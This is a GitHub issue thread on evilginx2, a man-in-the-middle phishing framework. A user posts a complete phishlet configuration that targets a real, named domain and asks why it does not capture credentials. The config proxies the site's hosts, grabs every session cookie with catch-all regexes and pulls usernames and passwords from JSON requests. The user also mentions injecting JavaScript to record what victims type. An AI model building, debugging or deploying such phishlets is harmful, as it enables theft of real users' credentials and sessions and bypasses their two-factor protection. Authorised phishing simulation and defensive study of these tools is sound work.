kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
11.01k stars 1.98k forks source link

Evilginx ver 3.3.0 cannot capture credentials #1109

Open alasalamont opened 2 months ago

alasalamont commented 2 months ago

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all, I am using Evilginx 3.3.0 and testing for this domain 1byte.com. But cannot catch the credentials

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!

iliwasel commented 2 months ago

I am trying to reproduce your issue but how did you manage to get evilginx and burp suite work together? I get Cannot read TLS response from mitm'd server proxyconnect tcp: EOF